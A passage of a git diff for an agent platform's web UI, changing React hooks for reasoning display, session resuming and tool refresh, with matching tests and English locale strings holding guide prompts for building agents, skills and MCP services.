+  const expandWhileActive = options.expandWhileActive ?? true;
+  const defaultExpanded = options.defaultExpanded ?? false;
   // Check if a text part already exists → reasoning is done
   const hasTextPart = useMemo(
     () => parts.some((p: any) => p.type === 'text' && p.text),
@@ -40,23 +50,21 @@ export function useReasoningToggle(
   /**
    * Get the display state for a specific reasoning part.
    * - reasoning in progress → expanded (true)
-   * - reasoning done → expanded by default, user can collapse manually
+   * - reasoning done → collapsed by default, user can expand manually
    */
   const getPartExpanded = (partKey: string): boolean => {
-    if (!isReasoningDone) return true;
+    const fallback = isReasoningDone ? defaultExpanded : expandWhileActive;
     // 思考结束后默认折叠，用户可手动展开
-    return expandedByKey[partKey] ?? false;
+    return expandedByKey[partKey] ?? fallback;
   };
 
   /**
    * Toggle a specific reasoning part's expanded state.
-   * Only works after reasoning is done.
    */
   const togglePart = (partKey: string) => {
-    if (!isReasoningDone) return;
     setExpandedByKey((prev) => ({
       ...prev,
-      [partKey]: !(prev[partKey] ?? true),
+      [partKey]: !(prev[partKey] ?? (isReasoningDone ? defaultExpanded : expandWhileActive)),
     }));
   };
 
diff --git a/webui/src/hooks/useSessionChat.test.ts b/webui/src/hooks/useSessionChat.test.ts
index 674e18991..74a4698e9 100644
--- a/webui/src/hooks/useSessionChat.test.ts
+++ b/webui/src/hooks/useSessionChat.test.ts
@@ -120,4 +120,22 @@ describe('useSessionChat.createAndSend — image forwarding', () => {
     );
     expect(promptCall![1]).toMatchObject({ agent: 'my-agent' });
   });
+
+  it('resumes from an initial session id without creating another session', async () => {
+    const { result } = renderHook(() =>
+      useSessionChat({ title: 'Test', autoCreate: false, initialSessionId: 'existing-session' }),
+    );
+
+    expect(result.current.sessionId).toBe('existing-session');
+
+    await act(async () => {
+      await result.current.createAndSend({ text: 'continue' });
+    });
+
+    expect(mockPost.mock.calls.some(([url]) => url === '/api/session')).toBe(false);
+    expect(mockPost).toHaveBeenCalledWith(
+      '/api/session/existing-session/prompt_async',
+      { parts: [{ type: 'text', text: 'continue' }] },
+    );
+  });
 });
diff --git a/webui/src/hooks/useSessionChat.ts b/webui/src/hooks/useSessionChat.ts
index f5e005fca..f936d6cc2 100644
--- a/webui/src/hooks/useSessionChat.ts
+++ b/webui/src/hooks/useSessionChat.ts
@@ -9,6 +9,8 @@ export interface UseSessionChatOptions {
   contextMessage?: string;
   /** Mock welcome message from assistant */
   welcomeMessage?: string;
+  /** Existing session to resume instead of creating a new one */
+  initialSessionId?: string | null;
   /** Auto-create session when hook mounts */
   autoCreate?: boolean;
 }
@@ -18,6 +20,8 @@ export interface CreateAndSendOptions {
   text: string;
   imageParts?: ImagePartData[];
   agent?: string;
+  model?: { providerID: string; modelID: string } | null;
+  displayText?: string;
 }
 
 export function useSessionChat({
@@ -25,13 +29,14 @@ export function useSessionChat({
   category,
   contextMessage,
   welcomeMessage,
+  initialSessionId = null,
   autoCreate = false,
 }: UseSessionChatOptions) {
-  const [sessionId, setSessionId] = useState<string | null>(null);
+  const [sessionId, setSessionId] = useState<string | null>(initialSessionId);
   const [loading, setLoading] = useState(false);
   const [error, setError] = useState<string | null>(null);
 
-  const sessionIdRef = useRef<string | null>(null);
+  const sessionIdRef = useRef<string | null>(initialSessionId);
   const createPromiseRef = useRef<Promise<string> | null>(null);
   const optionsRef = useRef({ title, category, contextMessage, welcomeMessage });
   optionsRef.current = { title, category, contextMessage, welcomeMessage };
@@ -87,6 +92,15 @@ export function useSessionChat({
     [],
   );
 
+  useEffect(() => {
+    if (initialSessionId === sessionIdRef.current) return;
+    sessionIdRef.current = initialSessionId;
+    createPromiseRef.current = null;
+    setSessionId(initialSessionId);
+    setLoading(false);
+    setError(null);
+  }, [initialSessionId]);
+
   const retry = useCallback(() => {
     setError(null);
     create().catch(() => {});
@@ -105,12 +119,16 @@ export function useSessionChat({
       text,
       imageParts,
       agent,
+      model,
+      displayText,
     }: CreateAndSendOptions): Promise<string> => {
       const sid = await create();
       const payload: Record<string, unknown> = {
         parts: buildPromptParts(text, imageParts),
       };
       if (agent) payload.agent = agent;
+      if (model) payload.model = model;
+      if (displayText) payload.displayText = displayText;
       client.post(`/api/session/${sid}/prompt_async`, payload).catch(() => {});
       return sid;
     },
diff --git a/webui/src/hooks/useSessions.test.ts b/webui/src/hooks/useSessions.test.ts
index 514f9dc47..1a1e0b35a 100644
--- a/webui/src/hooks/useSessions.test.ts
+++ b/webui/src/hooks/useSessions.test.ts
@@ -165,6 +165,33 @@ describe('updateMessagePart scheduling', () => {
     expect(result.current.messages[0].parentID).toBe('msg-1');
   });
 
+  it('keeps assistant error info from fetched messages', async () => {
+    vi.mocked(client.get).mockResolvedValueOnce({
+      data: [{
+        info: {
+          id: 'msg-error',
+          sessionID: 'sess-1',
+          role: 'assistant',
+          finish: 'error',
+          error: {
+            name: 'APIConnectionError',
+            data: { message: 'Connection error.' },
+          },
+          time: { created: 123 },
+        },
+        parts: [],
+      }],
+    } as any);
+
+    const { result } = renderHook(() => useSessionMessages('sess-1'));
+
+    await act(async () => {});
+
+    expect(result.current.messages).toHaveLength(1);
+    expect((result.current.messages[0].error as any).data.message).toBe('Connection error.');
+    expect(result.current.messages[0].finish).toBe('error');
+  });
+
   it('first appearance of a new part updates messages state immediately', async () => {
     const { result } = renderHook(() => useSessionMessages('sess-1'));
     // Wait for the initial fetchMessages effect to settle so it doesn't wipe state
diff --git a/webui/src/hooks/useSessions.ts b/webui/src/hooks/useSessions.ts
index 5ee94aa58..708813fd7 100644
--- a/webui/src/hooks/useSessions.ts
+++ b/webui/src/hooks/useSessions.ts
@@ -212,8 +212,13 @@ export function useSessionMessages(sessionId?: string) {
         parentID: msg.info.parentID,
         agent: msg.info.agent,
         model: msg.info.model,
+        modelID: msg.info.modelID,
+        providerID: msg.info.providerID,
+        cost: msg.info.cost,
+        tokens: msg.info.tokens,
         timestamp: msg.info.time?.created || Date.now(),
         finish: msg.info.finish || null,
+        error: msg.info.error || null,
         compacted: msg.info.compacted || null,
       }));
       
@@ -266,6 +271,10 @@ export function useSessionMessages(sessionId?: string) {
             // overwrite them with undefined.
             compacted: messageInfo.compacted ?? existing.compacted,
             finish: messageInfo.finish ?? existing.finish,
+            tokens: messageInfo.tokens ?? existing.tokens,
+            modelID: messageInfo.modelID ?? existing.modelID,
+            providerID: messageInfo.providerID ?? existing.providerID,
+            cost: messageInfo.cost ?? existing.cost,
           };
           // When a message finishes streaming, evict its part IDs from the
           // known-parts registry to reclaim memory.
@@ -295,6 +304,10 @@ export function useSessionMessages(sessionId?: string) {
               parts: updated[tempIndex].parts,
               agent: messageInfo.agent,
               model: messageInfo.model,
+              modelID: messageInfo.modelID,
+              providerID: messageInfo.providerID,
+              cost: messageInfo.cost,
+              tokens: messageInfo.tokens,
               timestamp: messageInfo.time?.created || updated[tempIndex].timestamp,
             };
             return updated;
@@ -310,6 +323,10 @@ export function useSessionMessages(sessionId?: string) {
           parentID: messageInfo.parentID,
           agent: messageInfo.agent,
           model: messageInfo.model,
+          modelID: messageInfo.modelID,
+          providerID: messageInfo.providerID,
+          cost: messageInfo.cost,
+          tokens: messageInfo.tokens,
           timestamp: messageInfo.time?.created || Date.now(),
         };
 
@@ -330,13 +347,13 @@ export function useSessionMessages(sessionId?: string) {
       });
     },
     /**
-     * 增量更新 message part（用于流式展示）
-     * @param partInfo - part 对象，包含 id, messageID, sessionID, type, text 等
-     * @param delta - 本次增量文本（如果有的话）
+     * Incrementally update a message part for streaming rendering.
+     * @param partInfo - Part object containing id, messageID, sessionID, type, text, etc.
+     * @param delta - Optional text delta for this update.
      *
-     * 首次出现的 part（结构性变化）立即同步更新，确保"思考中"等指示符
-     * 即时显示；已知 part 的内容增量则用 startTransition 降低优先级，
-     * 允许 React 合批调度以避免高频 SSE chunk 阻塞主线程。
+     * New parts are structural changes and update synchronously so thinking or
+     * streaming indicators appear immediately. Deltas for known parts are
+     * lowered with startTransition so React can batch high-frequency SSE chunks.
      */
     updateMessagePart: (partInfo: any, delta?: string) => {
       const isNewPart = !knownPartIdsRef.current.has(partInfo.id);
diff --git a/webui/src/hooks/useTools.test.tsx b/webui/src/hooks/useTools.test.tsx
index 9823a58f7..0f7711090 100644
--- a/webui/src/hooks/useTools.test.tsx
+++ b/webui/src/hooks/useTools.test.tsx
@@ -1,4 +1,4 @@
-import { renderHook, waitFor } from '@testing-library/react';
+import { act, renderHook, waitFor } from '@testing-library/react';
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 
 import { useTools } from './useTools';
@@ -15,22 +15,12 @@ vi.mock('@/api/tool', () => ({
   },
 }));
 
-function deferred<T>() {
-  let resolve!: (value: T | PromiseLike<T>) => void;
-  const promise = new Promise<T>((res) => {
-    resolve = res;
-  });
-  return { promise, resolve };
-}
-
 describe('useTools', () => {
   beforeEach(() => {
     vi.clearAllMocks();
   });
 
-  it('renders the tool list before the background refresh completes', async () => {
-    const refreshDeferred = deferred<{ data: { status: string } }>();
-
+  it('renders the tool list without automatically refreshing plugins', async () => {
     listMock.mockResolvedValue({
       data: [
         {
@@ -42,7 +32,6 @@ describe('useTools', () => {
         },
       ],
     });
-    refreshMock.mockReturnValue(refreshDeferred.promise);
 
     const { result } = renderHook(() => useTools());
 
@@ -53,22 +42,42 @@ describe('useTools', () => {
     expect(result.current.tools).toHaveLength(1);
     expect(result.current.tools[0].name).toBe('tool-alpha');
     expect(listMock).toHaveBeenCalledTimes(1);
-    expect(refreshMock).toHaveBeenCalledTimes(1);
+    expect(refreshMock).not.toHaveBeenCalled();
+  });
 
-    refreshDeferred.resolve({ data: { status: 'success' } });
+  it('fetches tools when the window regains focus without refreshing plugins', async () => {
+    listMock
+      .mockResolvedValueOnce({
+        data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
+      })
+      .mockResolvedValueOnce({
+        data: [
+          { name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true },
+          { name: 'tool-beta', description: 'beta tool', category: 'custom', source: 'custom', enabled: true },
+        ],
+      });
+
+    const { result } = renderHook(() => useTools());
 
     await waitFor(() => {
-      expect(listMock).toHaveBeenCalledTimes(2);
+      expect(result.current.loading).toBe(false);
     });
-  });
 
-  it('refreshes tools when the window regains focus after the throttle window', async () => {
-    const initialNow = Date.now();
+    expect(result.current.tools).toHaveLength(1);
+    expect(refreshMock).not.toHaveBeenCalled();
+
+    window.dispatchEvent(new Event('focus'));
+
+    await waitFor(() => {
+      expect(result.current.tools).toHaveLength(2);
+    });
+
+    expect(refreshMock).not.toHaveBeenCalled();
+    expect(listMock).toHaveBeenCalledTimes(2);
+  });
 
+  it('refreshes plugins only when refetch is called explicitly', async () => {
     listMock
-      .mockResolvedValueOnce({
-        data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
-      })
       .mockResolvedValueOnce({
         data: [{ name: 'tool-alpha', description: 'alpha tool', category: 'custom', source: 'custom', enabled: true }],
       })
@@ -86,18 +95,15 @@ describe('useTools', () => {
       expect(result.current.loading).toBe(false);
     });
 
-    expect(result.current.tools).toHaveLength(1);
-    expect(refreshMock).toHaveBeenCalledTimes(1);
-
-    const dateNowSpy = vi.spyOn(Date, 'now').mockReturnValue(initialNow + 6000);
-    window.dispatchEvent(new Event('focus'));
+    await act(async () => {
+      await result.current.refetch();
+    });
 
     await waitFor(() => {
       expect(result.current.tools).toHaveLength(2);
     });
 
-    expect(refreshMock).toHaveBeenCalledTimes(2);
-    expect(listMock).toHaveBeenCalledTimes(3);
-    dateNowSpy.mockRestore();
+    expect(refreshMock).toHaveBeenCalledTimes(1);
+    expect(listMock).toHaveBeenCalledTimes(2);
   });
 });
diff --git a/webui/src/hooks/useTools.ts b/webui/src/hooks/useTools.ts
index 8ad23fc55..7a2c2dcba 100644
--- a/webui/src/hooks/useTools.ts
+++ b/webui/src/hooks/useTools.ts
@@ -5,7 +5,6 @@ export function useTools() {
   const [tools, setTools] = useState<Tool[]>([]);
   const [loading, setLoading] = useState(true);
   const [error, setError] = useState<string | null>(null);
-  const lastRefreshRef = useRef(0);
   const initializedRef = useRef(false);
 
   const fetchTools = useCallback(async (showLoading = false) => {
@@ -22,10 +21,7 @@ export function useTools() {
     }
   }, []);
 
-  const refreshAndFetch = useCallback(async (force = false) => {
-    const now = Date.now();
-    if (!force && now - lastRefreshRef.current < 5000) return;
-    lastRefreshRef.current = now;
+  const refreshAndFetch = useCallback(async () => {
     try {
       await toolAPI.refresh();
     } catch { /* ignore */ }
@@ -38,24 +34,17 @@ export function useTools() {
     const init = async () => {
       await fetchTools(true);
       if (cancelled) return;
-
-      try {
-        await refreshAndFetch(true);
-        if (cancelled) return;
-      } catch {
-        /* ignore */
-      }
     };
 
     void init();
 
     const onVisible = () => {
       if (document.visibilityState === 'visible') {
-        void refreshAndFetch(false);
+        void fetchTools(false);
       }
     };
     const onFocus = () => {
-      void refreshAndFetch(false);
+      void fetchTools(false);
     };
     document.addEventListener('visibilitychange', onVisible);
     window.addEventListener('focus', onFocus);
@@ -64,12 +53,12 @@ export function useTools() {
       document.removeEventListener('visibilitychange', onVisible);
       window.removeEventListener('focus', onFocus);
     };
-  }, [fetchTools, refreshAndFetch]);
+  }, [fetchTools]);
 
   return {
     tools,
     loading,
     error,
-    refetch: () => refreshAndFetch(true),
+    refetch: refreshAndFetch,
   };
 }
diff --git a/webui/src/locales/en-US/agent.json b/webui/src/locales/en-US/agent.json
index 8f94d77ab..d6d4d7d42 100644
--- a/webui/src/locales/en-US/agent.json
+++ b/webui/src/locales/en-US/agent.json
@@ -78,6 +78,133 @@
   "sheet": {
     "done": "Done"
   },
+  "create": {
+    "emptyStateTitle": "No creation conversation yet",
+    "guidePanelTitle": "Rex Assisted Creation",
+    "guidePanelDesc": "Choose a guide or case. Rex will load the agent-builder skill first, confirm name, role, boundaries, and strategy, then generate files.",
+    "guideSectionTitle": "Creation Guides",
+    "caseSectionTitle": "Creation Cases",
+    "guideActions": [
+      {
+        "label": "How to Create",
+        "description": "Start from name, role, boundaries, strategy, and tool allowlist.",
+        "prompt": "Please follow the .flocks/plugins/skills/agent-builder skill to guide me through creating a Flocks sub-agent. Do not write files yet. Use the question tool to ask one most important question at a time and help me clarify agent name, role description, capability boundaries, execution strategy, tool allowlist, output format, and avoid cases. After I confirm, generate ~/.flocks/plugins/agents/<name>/agent.yaml and prompt.md, and show a plan before writing."
+      },
+      {
+        "label": "Clarify Boundaries",
+        "description": "Turn a fuzzy need into delegatable agent description and triggers.",
+        "prompt": "Please help me clarify the sub-agent's responsibility boundaries so the agent-builder skill can create it. Ask one question at a time to confirm: what task it solves, when Rex should delegate to it, what it must not do, required tools, whether it is read-only, output format, and acceptance checks."
+      },
+      {
+        "label": "Choose Strategy",
+        "description": "Choose among read_only, react, plan_and_execute, and explore.",
+        "prompt": "Please use the agent-builder skill to help me choose an execution strategy for this sub-agent. First confirm task risk, whether it needs file writes, command execution, codebase exploration, or web lookup, then recommend read_only, react, plan_and_execute, or explore with an appropriate tool allowlist."
+      },
+      {
+        "label": "Design Prompt",
+        "description": "Create a reusable system prompt with output format and constraints.",
+        "prompt": "Please help me design the sub-agent prompt.md. First confirm role, mission, capability list, output format, constraints, and example invocation scenarios. Do not write files until I confirm. After confirmation, draft prompt.md using the agent-builder skill template."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Threat Intel Agent",
+        "description": "Look up IOC reputation, correlate context, and produce an assessment report.",
+        "prompt": "I want to create a threat intelligence sub-agent for IP, domain, URL, and hash analysis. It should call existing intelligence tools in this project and output a structured assessment report. Please follow the agent-builder skill to guide me through name, tool allowlist, read-only boundaries, output format, and applicable scenarios."
+      },
+      {
+        "label": "Code Review Agent",
+        "description": "Read-only review of code risks, regressions, and missing tests.",
+        "prompt": "I want to create a code review sub-agent for read-only review of bugs, regression risks, security risks, and test gaps in code changes. Please follow the agent-builder skill to guide me through responsibility, read_only strategy, tool allowlist, and output format."
+      },
+      {
+        "label": "Log Analysis Agent",
+        "description": "Analyze security logs, extract key events, anomalies, and response suggestions.",
+        "prompt": "I want to create a log analysis sub-agent that reads security logs, identifies anomalous patterns, summarizes key events, and provides response recommendations. Please follow the agent-builder skill to guide me through input format, tool permissions, analysis steps, and final output structure."
+      }
+    ]
+  },
+  "edit": {
+    "emptyStateTitle": "No editing conversation yet",
+    "guidePanelTitle": "Rex Assisted Editing",
+    "guidePanelDesc": "Choose an editing entry. Rex will use the current Agent configuration to guide prompt, responsibility, permission, and parameter changes.",
+    "nativeGuidePanelDesc": "This is a built-in Agent. Only model and temperature can be saved, so Rex will guide model choice, temperature strategy, and validation.",
+    "guideSectionTitle": "Editing Guides",
+    "caseSectionTitle": "Editing Cases",
+    "guideActions": [
+      {
+        "label": "Improve Current Agent",
+        "description": "Review the current configuration, then clarify the change goal and boundaries.",
+        "prompt": "Please help me edit the current Agent \"{{name}}\". Start with a short diagnosis based on the current configuration and do not write files directly. Then use the question tool to ask one most important question at a time to clarify responsibility, prompt, tool permissions, output format, and acceptance checks. After confirmation, output a JSON configuration summary that can be extracted into the form."
+      },
+      {
+        "label": "Adjust Boundaries",
+        "description": "Clarify what it should do, when it should be delegated to, and what it must not do.",
+        "prompt": "Please help me refine the responsibility boundaries of the current Agent \"{{name}}\". Compare its existing description and System Prompt, point out anything too broad, too narrow, or unclear, then gradually confirm applicable scenarios, delegation triggers, avoid cases, required tools, and output structure."
+      },
+      {
+        "label": "Tighten Permissions",
+        "description": "Check whether Tools / Skills are excessive and reselect with least privilege.",
+        "prompt": "Please review the Tools and Skills configuration of the current Agent \"{{name}}\". The goal is least privilege: explain whether each capability is relevant to the responsibility, then recommend what to keep, remove, or add with reasons. Do not output the final configuration until I confirm."
+      },
+      {
+        "label": "Rewrite Prompt",
+        "description": "Improve role, constraints, steps, output format, and failure handling.",
+        "prompt": "Please help me rewrite the System Prompt of the current Agent \"{{name}}\". First point out whether its role, task steps, boundaries, output format, error handling, and example invocation are clear, then propose edits. After I confirm, output the complete Prompt and JSON configuration summary."
+      },
+      {
+        "label": "Validate Behavior",
+        "description": "Design test inputs, expected outputs, and failure criteria for post-save validation.",
+        "prompt": "Please help me validate the behavior of the current Agent \"{{name}}\". Based on its responsibility, design 2-3 test inputs and describe the expected output, pass criteria, and failure criteria for each. If the Prompt or tool permissions may affect the result, point out which fields should be adjusted. After confirmation, summarize the suggested configuration changes so they can be extracted into the form."
+      }
+    ],
+    "nativeGuideActions": [
+      {
+        "label": "Check Model Strategy",
+        "description": "Decide whether the current model fits this built-in Agent's task profile.",
+        "prompt": "Please review the model configuration of the built-in Agent \"{{name}}\". This is a built-in Agent: only model and temperature can be saved, so do not suggest changing Prompt, Tools, or Skills. First describe the model capabilities this task needs, then recommend whether to switch models and include the providerID and modelID if applicable."
+      },
+      {
+        "label": "Tune Temperature",
+        "description": "Choose temperature based on stability, creativity, and safety.",
+        "prompt": "Please help me tune the temperature of the built-in Agent \"{{name}}\". This is a built-in Agent: only model and temperature can be saved. Explain how lower or higher temperature affects this responsibility, then recommend a temperature value with reasoning and summarize it as extractable JSON."
+      },
+      {
+        "label": "Validate Behavior",
+        "description": "Design test inputs, expected outputs, and failure criteria for post-save validation.",
+        "prompt": "Please help me validate the model and temperature behavior of the built-in Agent \"{{name}}\". Design 2-3 test inputs with expected output, pass criteria, and failure criteria. If anything should change, only recommend model or temperature changes and summarize them as extractable JSON."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Make It Safer",
+        "description": "Reduce hallucination and over-permission risk for security analysis or review.",
+        "prompt": "I want the current Agent \"{{name}}\" to be more conservative and reliable. Please adjust its Prompt, temperature recommendation, and permission boundaries so it asks clarifying questions or states uncertainty when information is insufficient, without guessing, while keeping output clear and verifiable."
+      },
+      {
+        "label": "Better Delegation",
+        "description": "Help the primary Agent decide when to call it and how to consume its result.",
+        "prompt": "I want the current Agent \"{{name}}\" to work better as a delegated sub-agent. Please improve its English description, responsibility triggers, input requirements, and output format, and check whether the tool allowlist matches."
+      },
+      {
+        "label": "Add Output Format",
+        "description": "Stabilize the result shape so the primary Agent or workflow can continue processing.",
+        "prompt": "Please help me add a stable output format for the current Agent \"{{name}}\". First confirm the main usage scenario, then design fields, nesting, a short example, and behavior for abnormal cases. After I confirm, turn it into Prompt edits."
+      }
+    ],
+    "nativeCaseActions": [
+      {
+        "label": "Make It Safer",
+        "description": "Reduce randomness for security analysis, audit, or review tasks.",
+        "prompt": "I want the built-in Agent \"{{name}}\" to be more conservative and reliable. Only suggest model and temperature changes; do not modify Prompt, Tools, or Skills. Focus on the recommended temperature, required model capabilities, and how to validate after saving."
+      },
+      {
+        "label": "Improve Responsiveness",
+        "description": "Choose a more suitable model and temperature without changing built-in configuration.",
+        "prompt": "I want the built-in Agent \"{{name}}\" to respond faster and more consistently. Only evaluate model and temperature, explain whether a lighter model is suitable, recommend a temperature, and propose test inputs to validate the result."
+      }
+    ]
+  },
   "chat": {
     "createTitle": "Create Sub-Agent",
     "subtitle": "Describe your needs through conversation, AI generates configuration automatically",
diff --git a/webui/src/locales/en-US/common.json b/webui/src/locales/en-US/common.json
index a41ec753e..641b9da5f 100644
--- a/webui/src/locales/en-US/common.json
+++ b/webui/src/locales/en-US/common.json
@@ -113,7 +113,7 @@
     "defaultCreate": "Create",
     "defaultSave": "Save",
     "tabDetails": "Details",
-    "tabAIEdit": "AI Edit",
+    "tabAIEdit": "Workbench",
     "tabTest": "Test",
     "rexThinking": "Agent is thinking...",
     "editAndSend": "Edit the content below and send to the Agent to see the result",
@@ -127,7 +127,10 @@
     "cancelButton": "Cancel",
     "extracting": "Extracting...",
     "extractFromRex": "Extract from Rex",
+    "extractFromRexGuideDesc": "Extract Rex's configuration summary into the form.",
     "switchToForm": "Switch to Form",
+    "guideCollapse": "Collapse creation guides",
+    "guideExpand": "Expand creation guides",
     "testStartFailed": "Test start failed",
     "extractFailed": "Extraction failed, please retry",
     "rexAssist": "Rex Assist",
@@ -145,6 +148,7 @@
     "yes": "Yes",
     "no": "No",
     "needsAnswer": "Needs your response",
+    "customAnswer": "Custom / additional note",
     "confirm": "Confirm",
     "skip": "Skip"
   },
diff --git a/webui/src/locales/en-US/nav.json b/webui/src/locales/en-US/nav.json
index 7b54707aa..4eb050c04 100644
--- a/webui/src/locales/en-US/nav.json
+++ b/webui/src/locales/en-US/nav.json
@@ -23,6 +23,8 @@
   "expandNav": "Expand navigation",
   "collapseNav": "Collapse navigation",
   "switchLanguage": "Switch Language",
+  "switchToDarkTheme": "Switch to dark mode",
+  "switchToLightTheme": "Switch to light mode",
   "newVersion": "New Version",
   "hasNewVersion": "New version {{version}}",
   "versionInfo": "Flocks version info",
diff --git a/webui/src/locales/en-US/session.json b/webui/src/locales/en-US/session.json
index eb1118208..ebbf940ca 100644
--- a/webui/src/locales/en-US/session.json
+++ b/webui/src/locales/en-US/session.json
@@ -85,6 +85,34 @@
     "stopTitle": "Stop execution",
     "contextUsageTitle": "Context used: {{used}} / {{total}} ({{percent}}%)",
     "contextUsageUnknown": "Context usage unknown",
+    "contextUsage": {
+      "title": "Context Usage",
+      "close": "Close",
+      "full": "{{percent}}% Full",
+      "tokens": "~{{used}} / {{total}} Tokens",
+      "excludedTokens": "{{tokens}} excluded",
+      "noAttributedSegments": "No attributed breakdown",
+      "breakdown": {
+        "systemPrompt": "System prompt",
+        "toolDefinitions": "Tool definitions",
+        "tools": "Tool calls",
+        "skillLoad": "Skill loads",
+        "agentDelegation": "Agent delegation",
+        "conversation": "Conversation",
+        "reasoning": "Reasoning",
+        "draft": "Current draft",
+        "compactedHistory": "Compacted history"
+      }
+    },
+    "goal": {
+      "dismiss": "Dismiss goal notice",
+      "status": {
+        "active": "Goal",
+        "completed": "Completed",
+        "blocked": "Blocked",
+        "paused": "Paused"
+      }
+    },
     "edit": "Edit",
     "editRawHint": "You are editing the original unrendered content. Saving updates the raw message text directly.",
     "editRawTitle": "Edit raw content",
@@ -96,6 +124,11 @@
     "regenerate": "Regenerate",
     "thinking": "Thinking...",
     "streaming": "Streaming...",
+    "process": {
+      "title": "Process ({{count}})",
+      "reasoningCount": "{{count}} reasoning",
+      "toolCount": "{{count}} tool calls"
+    },
     "you": "You",
     "sending": "Sending...",
     "contextCompressed": "Context compressed",
@@ -160,10 +193,24 @@
       "inputParams": "Input Parameters",
       "outputResult": "Output Result",
       "todoStages": "Todo stages",
+      "todoStatus": {
+        "pending": "pending",
+        "inProgress": "in progress",
+        "completed": "completed",
+        "cancelled": "cancelled"
+      },
+      "todoSummary": {
+        "progress": "Progress",
+        "inProgress": "In progress",
+        "completed": "Completed",
+        "done": "Done"
+      },
       "errorLabel": "Error",
       "elapsed": "Elapsed",
       "workflowStage": "Current stage: {{phase}}",
       "workflowNode": "Node: {{node}}",
+      "workflowLoopIteration": "Loop",
+      "workflowLoopCurrent": "Current",
       "workflowStep": "Step: {{step}}",
       "workflowPhase": {
         "queued": "Queued",
diff --git a/webui/src/locales/en-US/skill.json b/webui/src/locales/en-US/skill.json
index d6cbcb46f..fd4b11ff5 100644
--- a/webui/src/locales/en-US/skill.json
+++ b/webui/src/locales/en-US/skill.json
@@ -79,6 +79,47 @@
     "missingDepsWarning": "Skill installed, but missing dependencies: {{missing}}",
     "runInstallDeps": "Click \"Install deps\" to complete setup"
   },
+  "create": {
+    "emptyStateTitle": "No creation conversation yet",
+    "guidePanelTitle": "Rex Assisted Creation",
+    "guidePanelDesc": "Choose a guide or case. Rex will load the skill-builder skill first, confirm goal, triggers, file structure, and validation before generating files.",
+    "guideSectionTitle": "Creation Guides",
+    "caseSectionTitle": "Creation Cases",
+    "guideActions": [
+      {
+        "label": "How to Create",
+        "description": "Start from purpose, triggers, instruction structure, dependencies, and validation.",
+        "prompt": "Please follow the .flocks/plugins/skills/skill-builder skill to guide me through creating a Flocks Skill. Do not write files yet. Use the question tool to ask one most important question at a time and help me clarify skill name, purpose, trigger scenarios, needed references/scripts, dependencies, output directory, and validation. After I confirm, generate ~/.flocks/plugins/skills/<skill-name>/SKILL.md and any necessary files."
+      },
+      {
+        "label": "Clarify Instructions",
+        "description": "Turn a fuzzy capability into a SKILL.md agents can use correctly.",
+        "prompt": "Please help me structure the skill instructions for SKILL.md. Ask one question at a time to confirm: what problem the skill solves, trigger keywords, when to use or avoid it, execution steps, reference materials, reusable scripts, quality checks, and examples."
+      },
+      {
+        "label": "Dependencies & Checks",
+        "description": "Plan bin/env/install specs, smoke tests, and failure guidance.",
+        "prompt": "Please use the skill-builder skill to help me design dependencies and validation for this Skill. First confirm whether it needs CLI tools, Python/Node packages, environment variables, or external services, then propose install specs, check commands, smoke tests, and user-facing failure guidance."
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "Security Analysis Skill",
+        "description": "Capture threat analysis steps, report format, and constraints as a Skill.",
+        "prompt": "I want to create a security analysis Skill that guides agents through alert or IOC analysis and outputs a structured assessment report. Please follow the skill-builder skill to guide me through triggers, analysis flow, report fields, references, and validation."
+      },
+      {
+        "label": "Code Migration Skill",
+        "description": "Capture cross-file migration, tests, and rollback considerations.",
+        "prompt": "I want to create a code migration Skill for framework upgrades or cross-file migrations. Please follow the skill-builder skill to guide me through applicable scenarios, migration steps, risk checks, test commands, and output format."
+      },
+      {
+        "label": "External System Skill",
+        "description": "Record usage flow, prohibited actions, and tool-call constraints for a system.",
+        "prompt": "I want to create an external system usage Skill that guides agents when operating a business system. Please follow the skill-builder skill to guide me through system name, login/query flow, available tools, prohibited bypasses, sensitive data handling, and acceptance checks."
+      }
+    ]
+  },
   "sheet": {
     "entityType": "Skill",
     "path": "Path",
diff --git a/webui/src/locales/en-US/tool.json b/webui/src/locales/en-US/tool.json
index 81f87692e..77169ccdf 100644
--- a/webui/src/locales/en-US/tool.json
+++ b/webui/src/locales/en-US/tool.json
@@ -92,6 +92,132 @@
     "testDetail": "Test / Details"
   },
 
+  "create": {
+    "mcp": {
+      "emptyStateTitle": "No setup conversation yet",
+      "guidePanelTitle": "Rex Assisted Setup",
+      "guidePanelDesc": "Choose a guide or case. Rex will confirm service type, transport, credentials, and start command before generating a testable MCP config.",
+      "guideSectionTitle": "Setup Guides",
+      "caseSectionTitle": "Setup Cases",
+      "guideActions": [
+        {
+          "label": "How to Add MCP",
+          "description": "Start from service name, stdio/SSE, command args, auth, and connectivity test.",
+          "prompt": "Please guide me through adding an MCP service. Do not write config yet. Use the question tool to ask one most important question at a time and help me confirm service name, transport (stdio or remote HTTP/SSE), start command or URL, auth method, credential storage, exposed tools, and connectivity test steps. After I confirm, generate the config and test it."
+        },
+        {
+          "label": "Local Stdio Service",
+          "description": "For MCP servers started by npx, uvx, python, or other local commands.",
+          "prompt": "Please help me add a local stdio MCP service. First confirm service name, start command, each command argument, required environment variables or secrets, working directory, and test method. Do not write config until I confirm."
+        },
+        {
+          "label": "Remote SSE/HTTP",
+          "description": "For deployed remote MCP services; confirm URL, transport, and auth.",
+          "prompt": "Please help me add a remote MCP service. First confirm service URL, transport (auto/SSE/Streamable HTTP), auth method, headers or token, whether secret management is needed, and health-check method. Do not write config until I confirm."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "GitHub MCP",
+          "description": "Add GitHub repository, issue, and pull request tools.",
+          "prompt": "I want to add a GitHub MCP service for repository, issue, and pull request operations. Please guide me through service name, start command, GITHUB_TOKEN secret storage, permission scope, and test steps."
+        },
+        {
+          "label": "Filesystem MCP",
+          "description": "Add file access for one restricted directory.",
+          "prompt": "I want to add a Filesystem MCP service that only accesses a specified directory. Please guide me through directory scope, read/write permissions, start arguments, safety limits, and test steps."
+        },
+        {
+          "label": "Remote Business MCP",
+          "description": "Add an internally deployed remote MCP service.",
